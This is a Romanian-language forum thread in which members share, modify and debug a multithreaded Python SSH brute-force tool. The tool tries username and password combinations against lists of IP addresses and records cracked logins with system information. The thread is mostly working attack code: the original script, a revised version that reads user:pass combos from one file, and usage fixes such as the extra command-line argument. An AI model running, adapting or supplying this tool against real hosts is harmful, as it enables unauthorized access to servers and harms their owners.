kmkozeu Posted February 16, 2019 Report Share Posted February 16, 2019 Salut rst, am vazut o sursa de ssh bruteforce in python mai exact a lui @Elohim sursa ia usererele dintr-un fisier diferit si parolele din alt fisier is curios daca poate cineva sa o modifice sa ia din acelasi fisier mai exact ex: pass.txt in fisier sa fie " user:pass " sau "user pass " aveti sursa mai jos, thx import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". 
If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain() Quote Link to comment Share on other sites More sharing options...
Turry — Posted February 16, 2019

Faci o singura variabila in care tii toate combo-urile id:pass. Dupa aceea faci un loop peste combo-uri, faci un split(":") si salvezi primul element in lista cu ID-uri si al doilea element in lista cu pass-uri.
Active Members MrGrj Posted February 16, 2019 Active Members Report Share Posted February 16, 2019 import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: 
users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() Quote Link to comment Share on other sites More sharing options...
kmkozeu Posted February 16, 2019 Author Report Share Posted February 16, 2019 5 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: 
users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() File "t.py", line 16 self.queue.task_done()? ^ SyntaxError: invalid syntax Quote Link to comment Share on other sites More sharing options...
kmkozeu Posted February 16, 2019 Author Report Share Posted February 16, 2019 (edited) 6 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 
'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() am rezolvat problema de mai sus, erau pusi ? la sfarsit la 2 linii, acum am alta problema mai exact eroarea asta cate thread-uri pun de atatea ori o da. root@mail:/home/administrator# python t.py 500 ips pass Exception in thread Thread-26: Traceback (most recent call last): File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner self.run() File "t.py", line 15, in run self.kraken(ip, user, passwd) File "t.py", line 24, in kraken dbg = str(sys.argv[4]) IndexError: list index out of range si asta No handlers could be found for logger "paramiko.transport" Edited February 16, 2019 by kmkozeu Quote Link to comment Share on other sites More sharing options...
kmkozeu (Author) — Posted February 17, 2019

cineva?
MrGrj (Active Members) — Posted February 19, 2019

On 2/16/2019 at 8:55 PM, kmkozeu said:
> File "t.py", line 24, in kraken dbg = str(sys.argv[4])

Trebuie sa mai pui un argument la sfarsitul comenzii:

    python t.py 500 ips pass bad
    # adauga asta            ^^^

On 2/16/2019 at 8:55 PM, kmkozeu said:
> No handlers could be found for logger "paramiko.transport"

Trebuie sa adaugi asta:

    paramiko.util.log_to_file("filename.log")